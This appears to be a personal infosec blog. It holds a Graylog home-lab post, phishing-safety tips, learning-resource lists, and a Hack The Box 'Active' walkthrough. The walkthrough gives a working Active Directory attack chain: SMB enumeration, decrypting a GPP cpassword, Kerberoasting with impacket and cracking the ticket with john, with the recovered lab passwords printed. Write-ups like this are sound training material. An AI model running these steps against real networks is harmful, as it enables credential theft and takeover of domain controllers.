Graylog, a good alternative

Graylog Dashboard for Apache

Running a home lab is nice, but having some control is even better.
And with control, I mean logging.

I have used Splunk, Qradar and Humio in job related activities over the years, and they have all pros and cons.
The biggest is often the issue related to licenses and complexity.

After setting up a Palo Alto firewall in my home setup, I really needed somewhere to ship the logs. I tried Splunk, but the free version is just missing to much. So i started googling for alternatives and there I found Graylog.

Pretty simple to set up, have a lot of features in the free version(not missing anything yet) and really good documentation.

At the moment I’m sending logs from the firewall, a webserver, a ssh-gateway and my pihole DNS server. I’ve only used syslog and filebeat, but more are supported.

I need to normalize the logs more, but its fun to set up notifications and creating dashboards. And to understand logs is important in most tech jobs, specially InfoSec.

Hack the Box “Active” Walktrough/Writeup

I’ve been playing with htb / Hack The Box for a little while, but I often stumble upon something that gets me stuck.

But this one in the Active Directory 101 path with the name Active is my first one “without” help.

First I did my usual nmap.

nmap -sV --script vuln 10.129.207.101


Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-25 08:36 BST
Nmap scan report for 10.129.207.101
Host is up (0.051s latency).
Not shown: 983 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-10-25 07:36:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false

I then edited my host file to link the IP to the domain active.htb.

nano /etc/hosts

After that I did some usual smbplay, and ended up with some nice files containing a username and something called cpassword.

smbclient -L 10.129.207.101
Enter WORKGROUP\htb-dr3as's password:
Anonymous login successful

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
SMB1 disabled -- no workgroup available

smbclient \\\\10.129.207.101\\Replication
Enter WORKGROUP\htb-dr3as's password:
Anonymous login successful

smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml


active.htb\SVC_TGS edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

I had to google what I’m able to to with the cpasssword, and gpp-decrypt was the first hit.

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

I then tried with smbclient again, this time with username and password, and there the userflag was.

smbclient -U active.htb\\SVC_TGS \\\\10.129.207.101\\Users
Enter ACTIVE.HTB\SVC_TGS's password:
Try "help" to get a list of possible commands.
smb: \>

smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)

With this user I also was able to use the GetUserSPNs script from impacket to get the administrators password.

impacket-GetUserSPNs -request -dc-ip active.htb active.htb/SVC_TGS -save -outputfile GetUserSPNs.out

john --wordlist=/usr/share/wordlists/rockyou.txt GetUserSPNs.out

Ticketmaster1968

And yet again there was some smb to get the rootflag.

smb: \Administrator\Desktop\> get root.txt

Emails… Talk to family and friends about them…

How many emails do you get every day? Or how many email addresses do you have? I have multiple email addresses, and even though I try to limit the number of emails received by unsubscribing to newsletters the number is high.

But what is it that I want you to talk to people about? Basically, it is to be careful. Most attacks start with an email, and this can happen both in private and at work. Will these tips help? I guess not on all, but on the generic spam/phishing emails, it will help.

Please get them to check this if you receive an email(Yes on all of them)

  • Did you expect the email?
    If not why are you getting this email?
  • Do you know the person/company sending it?
    If not why are you getting this email?
  • Are there attachments? If so, what type?
    Always be careful with attachments, don’t download or open them if you don’t expect them or need them.
  • Are there any links? Do they go to legitimate domains?
    Don’t click on links, you can hover your mouse above them to see where they will take you. If there is a link you should not click it, but open a window in your browser and write manually where you want to go(if it is from your bank or somewhere else, visit the site the way you use to).
  • Does the from email address look valid?
    It is easy to fake a from address. But if the name says john doe, and the email address is jane.doe@something.com something is fishy.
  • Is the text/offer too good to be true?
    No one is offering you money, bitcoin or gold!
  • Does the text/offer try to get you to do something in a hurry?
    When doing something quick, it is easier to make bad decisions

I know there is a lot of technical stuff that can be used and is used to help us with this. You can look at the headers, stuff like spf, dkim, dmarc, etc. But for the normal not tech-savvy person I would recommend the steps above.

If you have other tips please comment below.

New to Infosec?

When I first started looking into InfoSec the biggest problem was where to start. Some things related to work was ok, but where and what for the rest?

There are some much information around; Courses, youtube, podcasts, blogs etc.
In this post I’ll create and maintain a list of what I read, watch and listen to.

WhoWhatWhere
SANSA daily short podcast.
I always try to listen to this before work.
https://isc.sans.edu/podcast.html
Is also available on Apple Podcasts etc.
twit.tvWeekly Podcast about everything happening in the infosec world. Some great episodes and some not so great.https://twit.tv/shows/security-now
Is also available on Apple Podcasts etc.
MalwareTech
Marcus Hutchins
He has some great content on different platformsYoutube
Twitter
TikTok
John HammondYouTube videos on a lot of different topics. He has some great walkthroughs on CTFs.Youtube
Bleeping ComputerA great source of newsbleepingcomputer.com
Hack the BoxCTF. I have a subscription here to get the webbased Parrot OS unlimited use.hackthebox.com
PicoCTFCTF. This is for all ages, fun but hard.picoctf.org
Try Hack MeCTF. Have some great learning tracks.tryhackme.com

If you have any recommendations for me to put in the list please comment below.

CTF’s

security logo
Photo by Pixabay on Pexels.com

When I started to work with infosec I tried a lot of different ways to learn new stuff. I took some courses, read books, watched videos, etc.

But to learn new things, with some help on the way I found out that playing CTFs is a great way. These websites make hacking into a game, by giving you systems to play with, and your job is to get the token(s).

It may be a website you have to get access to, a windows server with vulnerable samba, or maybe a router with a default username/password combination. Some of the sites often have walkthroughs you can look at if you are stuck, and they are great for learning. But remember, DO EVERYTHING yourself as well, that’s the way you learn. Another important thing to remember is that these techniques should only be used on testing like this, using it in the wild may be illegal.

Well enough chatting about, here is my list of some great CTF sites.

  • hackthebox The one I pay for atm, mostely because of great labs, and the Parrot OS you get access trough your webbrowser(a great way to make your self safe)
  • tryhackme Have some great intro tutorials.
  • picoctf For people from the age of 13 and up. But dont get fooled, some of them are real hard. Free